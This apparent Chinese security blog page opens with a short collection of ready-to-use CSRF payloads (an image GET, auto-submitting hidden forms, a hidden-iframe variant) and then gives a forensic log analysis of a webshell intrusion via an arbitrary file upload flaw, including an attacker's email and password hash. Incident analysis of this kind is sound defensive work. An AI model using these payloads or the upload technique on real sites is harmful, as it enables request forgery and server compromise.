CSRF利用代码汇总

get 方式利用:

<img src="http://0535code.com/index.php?action=add" />

post方式利用:

<!-- JS版 -->
<form method="post" action="http://0535code.com/">
<input type="text" name="data" value="11" />
</form>
<script> document.forms[0].submit(); </script>
<!-- AJAX获取ID版1 -->
<form id="myfrom" name="myfrom" method="post" action="http://0535code.com/">
<input type="hidden" name="data" value="csrf1">
</form>
<script>
var myfrom = document.getElementById("myfrom");
myfrom.submit();
</script>
<!-- AJAX获取ID版2,隐藏访问后的返回页面 -->
<iframe frameborder="0" name="myiframe" width="0px" height="0px"></iframe>
<form id="myfrom" method="post" target="myiframe" action="http://0535code.com/">
<input type="hidden" name="data" value="csrf2">
</form>
<script>
var myfrom = document.getElementById('myfrom');
myfrom.submit();
</script>

一次WEB日志的反渗透分析

某次某客户网站中了后门,后门路径为:/home/wwwroot/default/Public/Uploadify/demo.php, demo.php是典型的一句话webshell,他是怎么上传到网站的呢?原因很多,可能是系统漏洞,提权上传的,这样的话直接用rootkit好了,没必要留个一句话后门,首先这种想法就排除了,另外就是可能因为弱口令或者上传漏洞等WEB漏洞上传的,这种可能性是最大的,如果通过渗透测试找到这个漏洞的话,会花很大的时间和精力,还有可以反渗透,理论上来讲反渗透肯定是可以查到缘故的,但是有时反渗透往往查不到,甚至很复杂,需要间接的去查也是有可能的。这次选择了反渗透查写入webshell的原因。

下载好日志access.log最近30天的日志,webshell的时间只可以借鉴,可以修改webshell时间的,不能以webshell时间为准。开始看了最近一个周的日志,没找到缘故,于是找了最近一个月的日志,才有眉目了。

//在日志中搜索demo.php发现有35个地方,都有demo.php

138.128.212.179 – – [16/Jul/2016:00:23:00 +0800] “GET /Public/js/demo.php HTTP/1.1” 404 791 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”

//通过这里看到,实际中的webshell地址不是这个,继续找下一个demo.php访问日志,

138.128.212.179 – – [16/Jul/2016:00:21:06 +0800] “POST /Public/Uploadify/demo.php HTTP/1.1” 404 1331 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0″

//找到这条了,这条日志是攻击者在访问webshell的日志,但是webshell返回404,说明这个文件不存在,可能是攻击者在测试是否成功写入webshell了。

//再次重新搜索?demo.php HTTP/1.1” 200 这样是webshell没有被删除的时候,找到21次访问记录,根据ip看下攻击者的轨迹(IP:138.128.212.179)
138.128.212.179 – – [12/Jul/2016:19:02:18 +0800] “GET /Public/uploadify.php HTTP/1.1” 404 791 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0” //Public/uploadify.php文件不存在 404
138.128.212.179 – – [12/Jul/2016:19:02:22 +0800] “GET /Public/uploadf.php HTTP/1.1” 200 13 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0” ?//Public/uploadif.php文件存在 200
138.128.212.179 – – [12/Jul/2016:19:02:26 +0800] “GET /Public/ HTTP/1.1” 403 273 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [12/Jul/2016:19:02:31 +0800] “GET /Uploads/ HTTP/1.1” 403 274 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [12/Jul/2016:19:02:36 +0800] “GET /Uploads/Pic/ HTTP/1.1” 404 791 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [12/Jul/2016:19:02:39 +0800] “GET /Uploads/ HTTP/1.1” 403 274 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [12/Jul/2016:19:02:41 +0800] “GET / HTTP/1.1” 302 3 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [12/Jul/2016:19:02:41 +0800] “GET /home/index/home.html HTTP/1.1” 302 3 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [12/Jul/2016:19:02:42 +0800] “GET /home/login/index.html HTTP/1.1” 200 1306 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”

//貌似找到/Public/uploadify.php这个上传文件了哦,攻击者在找上传目录;

138.128.212.179 – – [14/Jul/2016:18:41:14 +0800] “GET / HTTP/1.1” 302 3 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:16 +0800] “GET /home/index/home.html HTTP/1.1” 302 3 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:16 +0800] “GET /home/login/index.html HTTP/1.1” 200 1306 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:18 +0800] “GET / HTTP/1.1” 302 3 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:19 +0800] “GET /home/index/home.html HTTP/1.1” 302 3 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:21 +0800] “GET /home/login/index.html HTTP/1.1” 200 1306 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:21 +0800] “GET /1.log HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:23 +0800] “GET /public/upimg.htm?and+1=1+and+”=’ HTTP/1.1″ 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:23 +0800] “GET /public/upimg.htm HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:24 +0800] “GET /Public/upimg.htm HTTP/1.1” 200 744 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:24 +0800] “GET /public/uploadify.php HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:25 +0800] “GET /thisistest.txt HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:28 +0800] “GET /Public/uploadify.php HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:28 +0800] “GET /thisistest.txt HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:31 +0800] “GET /ajax.php HTTP/1.1” 200 54 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:32 +0800] “GET /Home/Login/loginadmin HTTP/1.1” 200 948 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:32 +0800] “GET /phpMyAdmin/ HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:34 +0800] “GET /pm/ HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:35 +0800] “GET /phpinfo.php HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:35 +0800] “GET /Bak_data/ HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:36 +0800] “GET /thisistest.txt HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:36 +0800] “GET /Public/UEditor/ueditor.all.js HTTP/1.1” 404 162 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:36 +0800] “GET /Data/ HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:37 +0800] “GET /db/ HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:37 +0800] “GET /Db/ HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:38 +0800] “GET /iProber.php HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:38 +0800] “GET /Public/3mz.php HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:39 +0800] “GET /thisistest.txt HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:39 +0800] “GET /Public/main1.php HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [14/Jul/2016:18:41:40 +0800] “GET /thisistest.txt HTTP/1.1” 404 791 “-” “python-requests/2.10.0”

//上面日志为攻击者在用python脚本扫描,木发现扫出什么敏感信息

138.128.212.179 – – [14/Jul/2016:18:52:21 +0800] “GET /User/Runtime/Logs/Home/16_07_14.log HTTP/1.1” 200 535770 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”

//这条信息是有用的,当thinkphp开启调试模式,记录日志时,默认会在这个目录下创建日志文件,而日志文件名为年_月_日,可以把日志下载下来,这里日志已经被攻击者下载了。下载看了下,是一份错误日志。

138.128.212.179 – – [14/Jul/2016:18:52:50 +0800] “GET /User/Runtime/Logs/Home/16_07_13.log HTTP/1.1” 200 429903 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:52:58 +0800] “GET /User/Runtime/Logs/Home/16_07_12.log HTTP/1.1” 200 27181 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:53:05 +0800] “GET /User/Runtime/Logs/Home/16_07_11.log HTTP/1.1” 200 452102 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:53:20 +0800] “GET /User/Runtime/Logs/Home/16_07_10.log HTTP/1.1” 200 431381 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:54:56 +0800] “GET /User/Runtime/Logs/Home/16_07_09.log HTTP/1.1” 200 433395 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:55:16 +0800] “GET /User/Runtime/Logs/Home/16_07_08.log HTTP/1.1” 200 462788 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:55:23 +0800] “GET /User/Runtime/Logs/Home/16_07_07.log HTTP/1.1” 200 433154 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:55:27 +0800] “GET /User/Runtime/Logs/Home/16_07_06.log HTTP/1.1” 200 441394 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:55:30 +0800] “GET /User/Runtime/Logs/Home/16_07_05.log HTTP/1.1” 200 459486 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:55:46 +0800] “GET /User/Runtime/Logs/Home/16_07_04.log HTTP/1.1” 200 664894 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:57:04 +0800] “GET /User/Runtime/Logs/Home/16_07_03.log HTTP/1.1” 200 1438415 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:58:04 +0800] “GET /User/Runtime/Logs/Home/16_07_02.log HTTP/1.1” 200 1966718 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:58:31 +0800] “GET /User/Runtime/Logs/Home/16_07_01.log HTTP/1.1” 200 428610 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:58:36 +0800] “GET /User/Runtime/Logs/Home/16_06_30.log HTTP/1.1” 200 522384 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:58:37 +0800] “GET /User/Runtime/Logs/Home/16_06_29.log HTTP/1.1” 200 77195 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:58:38 +0800] “GET /User/Runtime/Logs/Home/16_06_28.log HTTP/1.1” 404 1331 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:58:38 +0800] “GET /User/Runtime/Logs/Home/16_06_27.log HTTP/1.1” 404 1331 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:58:39 +0800] “GET /User/Runtime/Logs/Home/16_06_26.log HTTP/1.1” 404 1331 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [14/Jul/2016:18:58:39 +0800] “GET /User/Runtime/Logs/Home/16_06_25.log HTTP/1.1” 404 1331 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [15/Jul/2016:01:02:53 +0800] “GET / HTTP/1.1” 302 3 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:02:54 +0800] “GET /home/index/home.html HTTP/1.1” 302 3 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:02:55 +0800] “GET /home/login/index.html HTTP/1.1” 200 1306 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:02:55 +0800] “GET / HTTP/1.1” 302 3 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:02:55 +0800] “GET /home/index/home.html HTTP/1.1” 302 3 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:02:56 +0800] “GET /home/login/index.html HTTP/1.1” 200 1306 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:02:56 +0800] “GET /1.log HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:02:57 +0800] “GET /public/upimg.htm?and+1=1+and+”=’ HTTP/1.1″ 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:02:57 +0800] “GET /public/upimg.htm HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:02:58 +0800] “GET /Public/upimg.htm HTTP/1.1” 200 744 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:02:58 +0800] “GET /public/uploadify.php HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:02:58 +0800] “GET /thisistest.txt HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:02:59 +0800] “GET /Public/uploadify.php HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:02:59 +0800] “GET /thisistest.txt HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:03:00 +0800] “GET /ajax.php HTTP/1.1” 200 54 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:03:00 +0800] “GET /Home/Login/loginadmin HTTP/1.1” 200 948 “-” “python-requests/2.10.0”
223.104.91.228 – – [15/Jul/2016:01:03:00 +0800] “POST /Home/Index/tgbzcl HTTP/1.1” 200 86 “http://www.slbvip.com/Home/Index/home1” “Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X; zh-CN) AppleWebKit/537.51.1 (KHTML, like Gecko) Mobile/13F69 UCBrowser/10.9.15.793 Mobile”
138.128.212.179 – – [15/Jul/2016:01:03:01 +0800] “GET /phpMyAdmin/ HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:03:01 +0800] “GET /pm/ HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:03:02 +0800] “GET /phpinfo.php HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
138.128.212.179 – – [15/Jul/2016:01:03:02 +0800] “GET /Bak_data/ HTTP/1.1” 404 791 “-” “python-requests/2.10.0”
//看到这里都是python脚本在扫描,只扫描出了错误日志,其他的没有用的信息;

138.128.212.179 – – [15/Jul/2016:17:21:34 +0800] “GET /favicon.ico HTTP/1.1” 404 791 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [15/Jul/2016:17:21:55 +0800] “POST /Home/Common/uploadFace HTTP/1.1″ 200 59 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [15/Jul/2016:17:22:25 +0800] “POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1” 200 51 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:22:25 +0800] “POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1” 200 119 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:22:27 +0800] “POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1” 200 115 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:22:33 +0800] “POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1” 200 1526 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:22:36 +0800] “POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1” 200 112 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:22:45 +0800] “POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1” 200 1037 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:23:00 +0800] “GET /Public/uploadifiy.php HTTP/1.1” 200 0 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [15/Jul/2016:17:23:21 +0800] “POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1” 200 748 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:23:25 +0800] “POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1” 200 420 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:23:26 +0800] “POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1” 200 250 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:23:34 +0800] “POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1” 200 7 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:23:35 +0800] “POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1” 200 290 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:23:41 +0800] “POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1” 200 7 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:23:48 +0800] “POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1” 200 7 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:23:49 +0800] “POST /Uploads/Pic/2016-07-15/5788ab3374afb.php HTTP/1.1” 200 785 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”

//通过上面来看?/Home/Common/uploadFace 方法存在一个任意文件上传漏洞;攻击者在这里上传的文件,post访问都为200,不存在应该是返回404状态的;

138.128.212.179 – – [15/Jul/2016:17:24:36 +0800] “POST /Public/Uploadify/demo.php HTTP/1.1” 200 119 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:24:40 +0800] “POST /Public/Uploadify/demo.php HTTP/1.1” 200 7 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:24:43 +0800] “POST /Public/Uploadify/demo.php HTTP/1.1” 200 7 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:24:45 +0800] “POST /Public/Uploadify/demo.php HTTP/1.1” 200 7 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:24:45 +0800] “POST /Public/Uploadify/demo.php HTTP/1.1” 200 112 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:24:51 +0800] “POST /Public/Uploadify/demo.php HTTP/1.1” 200 110 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:24:53 +0800] “POST /Public/Uploadify/demo.php HTTP/1.1” 200 13 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [15/Jul/2016:17:24:59 +0800] “POST /Public/Uploadify/demo.php HTTP/1.1” 200 254 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”

//攻击者成功上传了demo.php 后门webshell了,之前开始上传的时候没有指定上传目录,这里上传到指定目录了,可见上传功能参数应该包括上传路径和文件名;

138.128.212.179 – – [16/Jul/2016:00:14:31 +0800] “GET /Public/Uploadify/demo.php HTTP/1.1” 404 791 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [16/Jul/2016:00:14:31 +0800] “GET /favicon.ico HTTP/1.1” 404 791 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [16/Jul/2016:00:14:43 +0800] “GET /Public/Ueditor/php/upload.php HTTP/1.1” 404 791 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [16/Jul/2016:00:14:44 +0800] “GET /Public/Ueditor/php/ HTTP/1.1” 404 791 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [16/Jul/2016:00:14:46 +0800] “GET /Public/Ueditor/ HTTP/1.1” 404 791 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [16/Jul/2016:00:14:47 +0800] “GET /Public/ HTTP/1.1” 403 273 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”

//中间攻击者用后门不晓得做过那些事情,这里还请求过/Public/Ueditor/php/upload.php文件,是404状态,不晓得是客户删除了,还是有防护软件攻击者没上传成功呢。

138.128.212.179 – – [16/Jul/2016:00:15:28 +0800] “GET /Home/Login/loginadmin/account/819432780@qq.com/password/e61d6ad4e829e87c9c3791d161f8522c HTTP/1.1” 302 3 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”

//看到一条这个记录,说明他是用这个账户登陆的,应该在后台直接把攻击者账户删掉,封禁IP,也可以加攻击者QQ聊聊。

138.128.212.179 – – [16/Jul/2016:00:16:04 +0800] “POST /Home/Common/uploadFace HTTP/1.1” 200 59 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”

//上面黑客的webshell被删掉了,又要来上传了

138.128.212.179 – – [16/Jul/2016:00:16:33 +0800] “POST /Uploads/Pic/2016-07-16/57890c445c548.php HTTP/1.1” 200 32 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”

//webshell上传成功了

138.128.212.179 – – [16/Jul/2016:00:16:43 +0800] “GET /Uploads/Pic/2016-07-16/57890c445c548.php HTTP/1.1” 200 32 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”

//黑客开始访问了,貌似出现问题了? 不能正常访问?

138.128.212.179 – – [16/Jul/2016:00:17:02 +0800] “POST /Home/Common/uploadFace HTTP/1.1” 200 60 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [16/Jul/2016:00:17:11 +0800] “POST /Uploads/Pic/2016-07-16/57890c7e951de.vbak HTTP/1.1” 405 166 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [16/Jul/2016:00:17:21 +0800] “GET /Uploads/Pic/2016-07-16/57890c7e951de.vbak HTTP/1.1” 200 32 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”

//又上传了一个vbak文件,可能是被杀掉了,返回405状态码,想绕过防护吧。

138.128.212.179 – – [16/Jul/2016:00:17:46 +0800] “POST /Home/Common/uploadFace HTTP/1.1” 200 57 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [16/Jul/2016:00:17:52 +0800] “GET /Uploads/Pic/2016-07-16/57890caaf344c.1 HTTP/1.1” 200 32 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”

//又改了个后缀名

138.128.212.179 – – [16/Jul/2016:00:18:45 +0800] “POST /Public/Uploadify/demo.php HTTP/1.1” 404 1331 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”

//访问demo.php 页面不存在

138.128.212.179 – – [16/Jul/2016:00:18:53 +0800] “POST /Uploads/Pic/2016-07-16/57890c7e951de.vbak HTTP/1.1” 405 166 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”
138.128.212.179 – – [16/Jul/2016:00:18:58 +0800] “POST /Uploads/Pic/2016-07-16/57890c7e951de.vbak HTTP/1.1” 405 166 “http://www.slbvip.com” “Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0”

//访问上传的webshell,返回405状态

138.128.212.179 – – [16/Jul/2016:00:23:29 +0800] “GET /Public/kindeditor/php/upload.php HTTP/1.1” 200 0 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”

//又被黑客找到一个上传点

138.128.212.179 – – [16/Jul/2016:00:23:51 +0800] “POST /Public/kindeditor/php/upload.php HTTP/1.0” 200 144 “http://slbvip.com” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”
138.128.212.179 – – [16/Jul/2016:00:23:52 +0800] “POST /Public/kindeditor/php/upload.php HTTP/1.0” 200 290 “http://slbvip.com” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”
138.128.212.179 – – [16/Jul/2016:00:23:53 +0800] “POST /Public/kindeditor/php/upload.php HTTP/1.0” 200 1526 “http://slbvip.com” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”
138.128.212.179 – – [16/Jul/2016:00:24:01 +0800] “POST /Public/kindeditor/php/upload.php HTTP/1.0” 200 6514 “http://slbvip.com” “Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)”

//尝试上传了数次,还是没有绕过去。

138.128.212.179 – – [19/Jul/2016:16:21:46 +0800] “GET /Uploads/146891188257179.jpg HTTP/1.1” 200 150958 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
138.128.212.179 – – [19/Jul/2016:16:21:55 +0800] “GET /Uploads/146890768218257.png HTTP/1.1” 200 78289 “-” “Mozilla/5.0 (Windows NT 5.2; rv:47.0) Gecko/20100101 Firefox/47.0”
